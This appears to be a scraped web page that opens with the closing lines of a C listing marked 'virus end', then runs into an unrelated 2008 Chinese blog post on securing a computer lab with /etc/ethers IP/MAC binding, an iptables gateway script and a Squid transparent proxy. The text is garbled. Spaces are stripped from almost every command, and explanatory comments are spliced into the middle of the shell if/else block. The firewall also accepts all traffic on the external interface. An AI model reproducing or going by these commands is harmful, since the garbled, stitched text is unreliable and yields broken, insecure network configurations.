close(f);
return(-1);
}

/*—————-virus end—————–*/<

用linux加iptable与squid来构建机房的安全

admin — Fri, 19 Dec 2008 13:51:04 +0000

eth0是我外网网卡，eth1是我内网网卡

1.建立静态IP/MAC捆绑

方法：建立/etc/ethers文件，其中包含正确的IP/MAC对应关系，格式如下：

[root@test2root]#more/etc/ethers

192.168.10.1800:10:DC:6B:C6:31

192.168.10.11100:10:5C:C0:2B:C1

192.168.10.134C:00:10:A3:38:5D

192.168.10.11300:E0:4C:00:0C:2B

192.168.10.16600:10:DC:61:B4:78

192.168.10.1078:06:18:25:88:40

192.168.10.17300:0F:1F:4D:EC:99

192.168.10.21200:10:DC:6A:C0:C0

192.168.10.2300:07:95:D8:C6:39

然后在/etc/rc.d/rc.local最后添加：arp-f即可实现IP/MAC捆绑

2.编写假包上网脚本

[root@test2root]#cat/etc/xxx

#!/bin/bash

echo”1″>/proc/sys/net/ipv4/ip_forward

INET_IFACE=”eth0″

INET_IP=”210.75.18.36″

LAN_IFACE=”eth1″

LAN_IP=”192.168.10.2″

LAN_IP_RANGE=”192.168.10.0/24″

IPT=”/sbin/iptables”

/sbin/depmod-a

/sbin/modprobeip_tables

/sbin/modprobeiptable_nat

/sbin/modprobeip_nat_ftp

/sbin/modprobeipt_mac

/sbin/modprobeipt_state

/sbin/modprobeipt_LOG

forTABLEinfilternatmangle;do

$IPT-t$TABLE-F

$IPT-t$TABLE-X

done

iptables-PINPUTDROP

iptables-POUTPUTDROP

iptables-PFORWARDDROP

$IPT-tnat-PPREROUTINGACCEPT

$IPT-tnat-PPOSTROUTINGACCEPT

$IPT-tnat-POUTPUTACCEPT

iptables-AINPUT-ilo-jACCEPT

iptables-AOUTPUT-olo-jACCEPT

iptables-AINPUT-ieth1-jACCEPT

iptables-AOUTPUT-oeth1-jACCEPT

iptables-AINPUT-ieth0-jACCEPT

iptables-AOUTPUT-oeth0-jACCEPT

iptables-AFORWARD-mstate–stateESTABLISHED,RELATED-jACCEPT

iptables-AFORWARD-s192.168.10.18-mmac–mac-source00:10:DC:6B:C6:31-jACCEPT#MAC、IP地址绑定校验

iptables-AFORWARD-s192.168.10.111-mmac–mac-source00:10:5C:C0:2B:C1-jACCEPT

iptables-AFORWARD-s192.168.10.13-mmac–mac-source4C:00:10:A3:38:5D-jACCEPT

iptables-AFORWARD-s192.168.10.113-mmac–mac-source00:E0:4C:00:0C:2B-jACCEPT

iptables-AFORWARD-s192.168.10.166-mmac–mac-source00:10:DC:61:B4:78-jACCEPT

iptables-AFORWARD-s192.168.10.10-mmac–mac-source78:06:18:25:88:40-jACCEPT

iptables-AFORWARD-s192.168.10.173-mmac–mac-source00:0F:1F:4D:EC:99-jACCEPT

iptables-AFORWARD-s192.168.10.212-mmac–mac-source00:10:DC:6A:C0:C0-jACCEPT

iptables-AFORWARD-s192.168.10.23-mmac–mac-source00:07:95:D8:C6:39-jACCEPT

iptables-AFORWARD-s192.168.10.52-mmac–mac-source00:02:A5:2E:B9:56-jACCEPT

/sbin/iptables-AFORWARD-ptcp–dport6881:6890-jDROP#限制BT下载

/sbin/iptables-AINPUT-ptcp–dport6881:6890-jDROP

/sbin/iptables-AOUTPUT-ptcp–dport6881:6890-jDROP

iptables-AFORWARD-ptcp-jLOG–log-levelinfo–log-prefix”INPUTpackets”#加入iptablesLOG信息,注意，要启用

if["$INET_IFACE"=ppp0];theniptablesLOG需要在/etc/syslog.conf

$IPT-tnat-APOSTROUTING-o$INET_IFACE-jMASQUERADE中加入kern.=info/var/log/iptables

else并重启syslog服务

$IPT-tnat-APOSTROUTING-o$INET_IFACE-jSNAT–to$INET_IP

3.启动SQUID

修改/etc/squid/squid.conf配置文件

将53行的#http_port3128修改为http_port3128

在1975行加入visible_hostnamexxx#也可以写机器名

修改cache_mem8MB为cache_mem170MB#在480行，大约使用内存的1/3

修改cache_dirufs/var/spool/squid10016256为cache_dirufs/var/spool/squid51224256#在679行，512代表缓存空间容量，24代表第一层目录数，256代表第二层目录数

在1699行加入aclmyclientsrc192.168.10.0/24#定义ip网段代码

在1760行加入http_accessallowmyclient#在http_accessallowlocalhosthttp_accessdenyall两行配置之前加入该配置

将错误信息页面链接到简体中文

[root@test2squid]#cd/etc/squid/

[root@test2squid]#rm-ferrors

[root@test2squid]#ln-s/usr/share/squid/errors/Simplify_Chinese/errors

[root@test2squid]#ll-derrors

lrwxrwxrwx1rootroot413月1710:11errors->/usr/share/squid/errors/Simplify_Chinese/

[root@test2squid]#

初始化和启动squid

[root@test2squid]#squid-z#创建squid缓存目录

2005/03/1710:27:44|CreatingSwapDirectories

[root@test2squid]#servicesquidstart#启动squid

启动squid：.[确定]

4.设置透明代理

编辑/etc/squid/squid.conf

在2067行添加以下配置

httpd_accel_hostvirtual

httpd_accel_port80

httpd_accel_with_proxyon

httpd_accel_uses_host_headeron

重新启动squid

[root@test2squid]#servicesquidrestart

停止squid：..[确定]